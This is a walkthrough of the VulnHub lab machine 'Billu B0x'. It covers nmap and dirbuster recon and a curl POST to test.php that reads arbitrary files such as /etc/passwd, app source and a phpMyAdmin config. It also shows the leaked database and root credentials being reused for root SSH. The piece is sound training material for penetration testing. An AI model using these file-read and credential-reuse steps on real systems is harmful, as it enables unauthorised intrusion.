Billu B0x – Writeup

Details

This machine is https://www.vulnhub.com/entry/billu-b0x,188/

Recon Phase

My first step was locating the target

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00019s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00012s latency).
MAC Address: 08:00:27:D7:7B:27 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.107
Host is up (0.00026s latency).
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds

From there I carried out a service discovery scan

root@kali:~# nmap -sV 192.168.56.107
Nmap scan report for 192.168.56.107
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds

Web application

I went to the webserver at http://192.168.56.107

Screenshot 1

It mentions sql injections but, in the description of the machine it mentioned tricks, so before putting any time into sql injections I setup dirbuster

Screenshot 2

Screenshot 3

With lots of results I started with in.php at http://192.168.56.107/in.php

Screenshot 4

And then onto http://192.168.56.107/add.php

Screenshot 5

Now there was a potential to upload scripts here, but it didn't allow upload of php files and without an LFI I wouldn't be able to use it, so I moved on again, eventually ending up on http://192.168.56.107/test.php

Screenshot 6

The mention of a param called file made me think it may work as a LFI vuln, so I tried it out

http://192.168.56.107/test.php?file=/etc/passwd

But with a get param named file it came up with the same message, so I used curl to try it as a post param

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

I then tried including one of the php files I found earlier

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=add.php"
<?php
echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
    <input type=text name=name value="name">
    <input type=text name=address value="address">
    <input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';
?>

First off, something seemed off, normally when I include php files it executes the php but this time it showed it to me, but I wasn't sure why this happened yet. But onto the code, it only echos the form, which posts back to itself but this file had no handler for it, unless it was included into another file which handles it then the form does nothing

So as this gave me no leads, I began to pull the source from other files

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=c.php"
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }
?>

This gave me some cred for the mysql server of

billu:b0x_billu

But from /etc/passwd I knew these weren't creds I could use for ssh, so I checked the index file

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=index.php"
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
    $_SESSION['logged']='';
}
if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
    echo "you are logged in :)";
    header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps']));
    $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
    $result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
       echo "You are allowed<br>";
       $_SESSION['logged']=true;
       $_SESSION['admin']=$row['username'];
     header('Location: panel.php', true, 302);
}
else
{
    echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>

With the source I would be able to work on an sql injection payload, but before doing that, I found the code redirected to panel.php when it was logged in, so I grabbed the source for that

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=panel.php"
<?php
session_start();
include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
        header('Location: index.php', true, 302);
        exit();
}
echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
    unset($_SESSION['logged']);
    unset($_SESSION['admin']);
    header('Location: index.php', true, 302);
}
echo '<hr><br>';
echo '<form method=post>
<select name=load>
    <option value="show">Show Users</option>
    <option value="add">Add User</option>
</select>
 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
    $dir=getcwd();
    $choice=str_replace('./','',$_POST['load']);
    if($choice==='add')
    {
            include($dir.'/'.$choice.'.php');
            die();
    }
        if($choice==='show')
    {
        include($dir.'/'.$choice.'.php');
        die();
    }
    else
    {
        include($dir.'/'.$_POST['load']);
    }
}
if(isset($_POST['upload']))
{
    $name=mysqli_real_escape_string($conn,$_POST['name']);
    $address=mysqli_real_escape_string($conn,$_POST['address']);
    $id=mysqli_real_escape_string($conn,$_POST['id']);
    if(!empty($_FILES['image']['name']))
    {
        $iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
    $r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
    $image=array('jpeg','jpg','gif','png');
    if(in_array($r,$image))
    {
        $finfo = @new finfo(FILEINFO_MIME);
    $filetype = @$finfo->file($_FILES['image']['tmp_name']);
        if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
                {
                    if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
                             {
                              echo "Uploaded successfully ";
                              $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')';
                             mysqli_query($conn, $update);
                            }
                }
            else
            {
                echo "<br>i told you dear, only png,jpg and gif file are allowed";
            }
    }
    else
    {
        echo "<br>only png,jpg and gif file are allowed";
    }
}
}
?>

From this I could see that unless I was logged in it would redirect back to index, now I could try sql injection now to log in, but I wanted to see if there were any more hints, so I included the source of the file I was using as LFI

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=test.php"
<?php
function file_download($download)
{
    if(file_exists($download))
                {
                    header("Content-Description: File Transfer");
                    header('Content-Transfer-Encoding: binary');
                    header('Expires: 0');
                    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                    header('Pragma: public');
                    header('Accept-Ranges: bytes');
                    header('Content-Disposition: attachment; filename="'.basename($download).'"');
                    header('Content-Length: ' . filesize($download));
                    header('Content-Type: application/octet-stream');
                    ob_clean();
                    flush();
                    readfile ($download);
                }
                else
                {
                echo "file not found";
                }
}
if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{
echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}

This was a bit of a setback, as the function being used to include was "readfile" not "include" this meant I didn't have and LFI vuln, I had a local file read vuln which wouldn't be able to run any code I could get uploaded. With the idea of LFI no longer available, I moved back to enumeration and setup dirbuster again with a different wordlist

Screenshot 7

Screenshot 8

My eye was instantly drawn to the directory called "phpmy" directory, so I went to it at http://192.168.56.107/phpmy/

Screenshot 9

It was a phpmyadmin page, and earlier I found some creds for the database of

billu:b0x_billu

So I logged in with them

Screenshot 10

Inside I found the ica_labs db and within it the login creds for the webapp

Screenshot 11

The creds were

biLLu:hEx_it

But having already inspected the code I knew that even if I logged in I hadn't seen an exploit there. But I realised, I had local file read, and phpmyadmin may have higher privileged creds in it's config file, which would be located at

/var/www/phpmy/config.inc.php

Using my local file read I took a look at the code

root@kali:~# curl http://192.168.56.107/test.php -X POST -d "file=/var/www/phpmy/config.inc.php"
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>

This gave me the root mysql login of

root:roottoor

I tried these creds on ssh

root@kali:~# ssh 192.168.56.107
root@indishell:~#

After a quick look around I wasn't able to locate a flag, but with a root shell the machine was done!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.